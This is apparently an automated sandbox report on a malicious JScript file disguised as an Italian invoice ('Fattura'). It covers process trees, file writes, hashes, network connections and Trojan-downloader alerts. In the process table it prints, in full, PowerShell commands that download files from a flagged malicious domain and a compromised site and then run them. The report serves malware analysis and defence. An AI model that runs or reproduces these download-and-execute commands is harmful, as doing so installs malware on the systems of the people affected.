File name: | _Fattura 2019_21.jse |
Full analysis: | https://app.any.run/tasks/e3de2217-8229-4ec3-b3ee-10d8d54648f2 |
Verdict: | Malicious activity |
Analysis date: | January 22, 2019, 17:03:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines |
MD5: | 5E5F2901F880BFB7AFA536BDFE6D9106 |
SHA1: | 5F2868D700444B1730C2610566291085C9042421 |
SHA256: | E492D854DB7268ADA7CA24718AEFDEFFCEB1E9F8263FB1E13C223DCC6D4AFA55 |
SSDEEP: | 96:0GyEeq6ati4tHa7JPafaL1kxunnMtA27I9dXHnQN:0DGY7J423nF0yd3n2 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3392 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Fattura 2019_21.jse" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2480 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ucctffed = $env:APPDATA + 'IntelMeFWServic.exe.exe'; ( New-Object System.Net.WebClient ).DownloadFile('http://fm.centeredinself.com/index',$ucctffed); Start-Process $ucctffed; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2696 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hwvzfjg = $env:APPDATA + 'hp10678.jpg.jpg'; ( New-Object System.Net.WebClient ).DownloadFile('http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg',$hwvzfjg); Start-Process $hwvzfjg; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4008 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3916 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2480 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T2WWW1T32QC755C34QJB.temp | — | |
MD5:— | SHA256:— | |||
2696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GZJ7WZ4CEWGT9XB7OC8V.temp | — | |
MD5:— | SHA256:— | |||
4008 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs9B7B.tmp | — | |
MD5:— | SHA256:— | |||
4008 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs9B7C.tmp | — | |
MD5:— | SHA256:— | |||
2696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198a25.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2480 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198a16.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2480 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2696 | powershell.exe | C:\Users\admin\AppData\Roaminghp10678.jpg.jpg | image | |
MD5:3470A9058F7B8A3858C0FEAF8A3E2BD3 | SHA256:C835879D0E3AE1CBA698B49481DA41A26CE605B8C5082ED3309873613D9AF202 | |||
2480 | powershell.exe | C:\Users\admin\AppData\RoamingIntelMeFWServic.exe.exe | text | |
MD5:C87363BA121297B063E83344E122B6D3 | SHA256:F8BF41177A5F5E808A7CCB648B51080B031F15CA8018D91A576263D6CC626EB6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2696 | powershell.exe | GET | 200 | 62.141.56.35:80 | http://www.flpscuolafoggia.it/wp-content/uploads/2018/12/auguri-di-capodanno-2019.jpg | DE | image | 264 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 216.58.205.238:80 | — | Google Inc. | US | whitelisted |
2696 | powershell.exe | 62.141.56.35:80 | www.flpscuolafoggia.it | Keyweb AG | DE | unknown |
2480 | powershell.exe | 185.189.149.177:80 | fm.centeredinself.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
www.flpscuolafoggia.it |
| unknown |
fm.centeredinself.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2480 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2480 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |